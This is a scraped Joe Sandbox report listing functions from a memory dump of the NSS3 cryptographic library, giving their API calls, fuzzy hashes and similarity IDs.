Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 183d5cadef1aa9186cb96808c97cf489ac15f371bf7a947d443800ba532a22bc
Instruction ID: 85911fda0f079382e66a08440fb0e928e0e066368f5dbdd7bebeade5d6fdcab2
Opcode Fuzzy Hash: 183d5cadef1aa9186cb96808c97cf489ac15f371bf7a947d443800ba532a22bc
Instruction Fuzzy Hash: 0511A7B1A0470AABE7209E65EEC4B0673ACEB0035CF104535E92983F01E330F455C7E1

Function 6C798DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C798DE7
EnterCriticalSection.KERNEL32 ref: 6C798DFC
PR_Unlock.NSS3 ref: 6C798E2D
PR_SetError.NSS3 ref: 6C798E49

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0ea4635a426461dd80599a52b0c45f02127b5c8736158c595e464fb7295fe0a5
Instruction ID: 2184b96a43ecadf109988b4e0ea2b6817e8c745853c7acea71149e495284b12d
Opcode Fuzzy Hash: 0ea4635a426461dd80599a52b0c45f02127b5c8736158c595e464fb7295fe0a5
Instruction Fuzzy Hash: 29118F75A056019BDB10AF78D548569BBF4FF05318F014939DC88D7B01E730E854CBC1

Function 6C81AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C805F17,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C805F17,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACDB

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 7a6276d1943769a6bf820f5146f3cd9af62ba0c20566ec0ccfd3680b0f37be5e
Instruction ID: 3e329cfe52c9c7e8a2f47c36f8c86cb97562d39b7e9704fdf5637f450d2ef416
Opcode Fuzzy Hash: 7a6276d1943769a6bf820f5146f3cd9af62ba0c20566ec0ccfd3680b0f37be5e
Instruction Fuzzy Hash: 70015EB1601B029BEB60DF2ADA09793B7E8BF00699B114839D85AD3E00E735F159CBD1

Function 6C7DC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7DC5AD

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

CERT_DecodeCertPackage.NSS3(?,?,6C7DC610,?), ref: 6C7DC5C2

Part of subcall function 6C7DC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7DC0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C7DC5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DC5EF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: 6db365dd6faf401ed694e29fbdcf45925b8db468ac3d69679cf8de2994d68282
Instruction ID: 8455cf74703c6d21dd21ad058e7f4abe87fd6626d8103c026d3e45a3dac7e1b4
Opcode Fuzzy Hash: 6db365dd6faf401ed694e29fbdcf45925b8db468ac3d69679cf8de2994d68282
Instruction Fuzzy Hash: 40018FB1E001086BEB10AB64DD0AABF7B78DB00618F464079EC06AB241F662B918C6E1

Function 6C7D24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C7AC154,000000FF,00000000,00000000,00000000,00000000,?,?,6C7AC154,?), ref: 6C7D24FA
PORT_Alloc_Util.NSS3(00000000,?,6C7AC154,?), ref: 6C7D2509

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C7D2525
free.MOZGLUE(00000000), ref: 6C7D2532

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: 3b61a2baa3e5284d15eba697227c860f17841623ad17df9b0572c0e261c3aad9
Instruction ID: 44a58f26e048beb3ddf07108b4d9f33095cb87f26fe67a438f316107f6fdfb30
Opcode Fuzzy Hash: 3b61a2baa3e5284d15eba697227c860f17841623ad17df9b0572c0e261c3aad9
Instruction Fuzzy Hash: BBF096B230A12177FA20267A5D0DE7739ACDB416F8F150231BD29C66C1D952DD02C1F1

Function 6C880660 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C887B1B,?,?,?,?,?,?,?,?,?,6C88798A), ref: 6C880670

Part of subcall function 6C839EA0: DeleteCriticalSection.KERNEL32(?), ref: 6C839EAA

free.MOZGLUE(?,00000000,00000000,?,?,6C887B1B,?,?,?,?,?,?,?,?,?,6C88798A), ref: 6C880696
free.MOZGLUE(00000004,6C887B1B,?,?,?,?,?,?,?,?,?,6C88798A), ref: 6C8806C7
free.MOZGLUE(?,00000000,00000000,?,?,6C887B1B,?,?,?,?,?,?,?,?,?,6C88798A), ref: 6C8806E9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyLockSection
String ID:
API String ID: 1785261712-0
Opcode ID: e1b1568fd254296594f4cb65af67d398b255da5bd1c411e1ca9c5762cf2fa11f
Instruction ID: 30af357c20af134a2aa928f5ab72bc33ae50554645bec40db11f2c2967fb50ec
Opcode Fuzzy Hash: e1b1568fd254296594f4cb65af67d398b255da5bd1c411e1ca9c5762cf2fa11f
Instruction Fuzzy Hash: A31112F46022019BEF20CB99E989B06B7B8AB4626CF084135E40587A11D772FD85CBD9

Function 6C81AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC2D

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_FreeSymKey.NSS3(?,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC59
free.MOZGLUE(8CB6FF01,6C7F6AC6,6C80639C,?,?,?,?,?,?,?,?,?,6C805D40,00000000,?,6C80AAD4), ref: 6C81AC62

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 327db47b81629ce45ae49c546132406a671d97ca4662c3536b6cf665e6eb230b
Instruction ID: a604e2451f8c99ed1a36a1aa056ce3afacbcfd170d615538c2e4bbaa8f1aaf60
Opcode Fuzzy Hash: 327db47b81629ce45ae49c546132406a671d97ca4662c3536b6cf665e6eb230b
Instruction Fuzzy Hash: 80018FB56002019FDB10DF15EAC4B8677E8AF0471CF188468E8098FB06E731E848CBA1

Function 6C7EA710 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

PK11_DestroyContext.NSS3(?,00000001,-00000001,?,6C81186B,?), ref: 6C7EA738

Part of subcall function 6C79CD80: free.MOZGLUE(?,6C79D079,00000000,00000001), ref: 6C79CDA5
Part of subcall function 6C79CD80: PK11_FreeSymKey.NSS3(?,6C79D079,00000000,00000001), ref: 6C79CDB6
Part of subcall function 6C79CD80: SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C79D079,00000000,00000001), ref: 6C79CDCF
Part of subcall function 6C79CD80: DeleteCriticalSection.KERNEL32(?,6C79D079,00000000,00000001), ref: 6C79CDE2
Part of subcall function 6C79CD80: free.MOZGLUE(?), ref: 6C79CDE9

PK11_DestroyContext.NSS3(?,00000001,-00000001,?,6C81186B,?), ref: 6C7EA757
PK11_DestroyContext.NSS3(?,00000001,-00000001,?,6C81186B,?), ref: 6C7EA776
PK11_DestroyContext.NSS3(?,00000001,-00000001,?,6C81186B,?), ref: 6C7EA795

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$ContextDestroy$free$CriticalDeleteFreeItem_SectionUtilZfree
String ID:
API String ID: 3138553132-0
Opcode ID: 492b612786a5ec9ed6f512fb0ce52e46a673138c3700f546dfff5c578f687e19
Instruction ID: e7f2c1a9c438d6b910c0605777de0d4ca2503ca6ac47e993727b3855ac05456f
Opcode Fuzzy Hash: 492b612786a5ec9ed6f512fb0ce52e46a673138c3700f546dfff5c578f687e19
Instruction Fuzzy Hash: 60011EF1A107105BEB209A359E897C77BE86B04619F40482CE6ADDB681E775B0488BA4

Function 6C800450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C804710,?,000F4240,00000000), ref: 6C80046B
GetLastError.KERNEL32(?,6C804710,?,000F4240,00000000), ref: 6C800479

Part of subcall function 6C81BF80: TlsGetValue.KERNEL32(00000000,?,6C80461B,-00000004), ref: 6C81C244

PR_Unlock.NSS3(40C70845,?,6C804710,?,000F4240,00000000), ref: 6C800492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C804710,?,000F4240,00000000), ref: 6C8004A5

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 49d70b86a07ae12c263c28387fb858737799f3cc88a495d7030ec462ad081001
Instruction ID: 3ef4971f15db80a071a0f882bb4f13c3791a3c8a587680a6200f82e20c7e021c
Opcode Fuzzy Hash: 49d70b86a07ae12c263c28387fb858737799f3cc88a495d7030ec462ad081001
Instruction Fuzzy Hash: F2F0B474B14A455BEB20AFB99E18B1B33E99B0120DF058C35E80AC7E51EB25E544C659

Function 6C7987E0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C7987EA
PK11_DestroyTokenObject.NSS3(?,00000000), ref: 6C798809
CERT_DestroyCertificate.NSS3(00000000), ref: 6C798818
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C798821

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Destroy$K11_Private$CertCertificateFromObjectToken
String ID:
API String ID: 3228624125-0
Opcode ID: ac916d6c03ed572d4810efe894036a746260e874c6db0241746666bb94f464c0
Instruction ID: 6ac5f922eda4bf2150bfdf72d01136a8cbbbc41b416073ee1d0af6d8818a5153
Opcode Fuzzy Hash: ac916d6c03ed572d4810efe894036a746260e874c6db0241746666bb94f464c0
Instruction Fuzzy Hash: A0E055B7C1212827DA010922BD48E8A362C8B8427CF084231ED0A5A742F731DD0883F1

Function 6C88CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C88CC61
free.MOZGLUE ref: 6C88CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C88CC80
free.MOZGLUE(?), ref: 6C88CC87

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: e74f586d818228a5a950ab09dae3b6012bd41758db257951ea0c7a60814b9ff2
Instruction ID: 5447092ed3c93a3209bb6c0b411e3414a8654ba415925ba3e435b610ded7132f
Opcode Fuzzy Hash: e74f586d818228a5a950ab09dae3b6012bd41758db257951ea0c7a60814b9ff2
Instruction Fuzzy Hash: E8E065B6700608AFCA10EFA9DC48C8777BCEE492743150535E691C3701D232F905CBE1

Function 6C7C4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7C4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C7C4DE6

Strings

%d.%d, xrefs: 6C7C4DDE

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: db05111ebf49a84152b1063b0a2011c1f6bf54cd82b1e80287d603aa38f9c647
Instruction ID: af9c816e45c54f2c68671c2b210d1b6e01f10693eee91ce7df2e9a7122ec88ee
Opcode Fuzzy Hash: db05111ebf49a84152b1063b0a2011c1f6bf54cd82b1e80287d603aa38f9c647
Instruction Fuzzy Hash: C831ECB2E042196FEB606BA59D06BFF7768EF44308F050439ED155B741EB349909CBE2

Function 6C7E4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8~l,00000000,00000000,?,?,6C7E3827,?,00000000), ref: 6C7E4D0A

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C7E4D22

Part of subcall function 6C7CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C771A3E,00000048,00000054), ref: 6C7CFD56

Strings

'8~l, xrefs: 6C7E4D07

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8~l
API String ID: 1521942269-3277948344
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 14b88311de2a8c24bd9814c1e7f1e0e155d9228babcf0038d57b265bbd2928f3
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: B5F09C3360113557DB108DEA9E4578736DC9B4967DF1502B1DE18CBB81E631DC04D6D1

Function 6C760F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B

Part of subcall function 6C761370: GetSystemInfo.KERNEL32(?,?,?,?,6C760936,?,6C760F20,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000), ref: 6C76138F

PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

Part of subcall function 6C761110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C760936,00000001,00000040), ref: 6C761130
Part of subcall function 6C761110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C760936,00000001,00000040), ref: 6C761142
Part of subcall function 6C761110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C760936,00000001), ref: 6C761167

Strings

clock, xrefs: 6C760F20

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: e731fff55e9371f81c8d3c3c2e048ba8f811e912475d452494f70806ade457d6
Instruction ID: 61929b0b87c4588932b92136ba46bfab1a1f9cad0c9cd5dda9a8de449e537789
Opcode Fuzzy Hash: e731fff55e9371f81c8d3c3c2e048ba8f811e912475d452494f70806ade457d6
Instruction Fuzzy Hash: 78D0123160414457C52166979D4DB96B6ACC7C33BDF104836E50982E104A69A8EBD7A9

Function 6C7D0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C7D0DF5
TlsGetValue.KERNEL32 ref: 6C7D0E2D
TlsGetValue.KERNEL32 ref: 6C7D0E58
TlsGetValue.KERNEL32 ref: 6C7D0E84

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
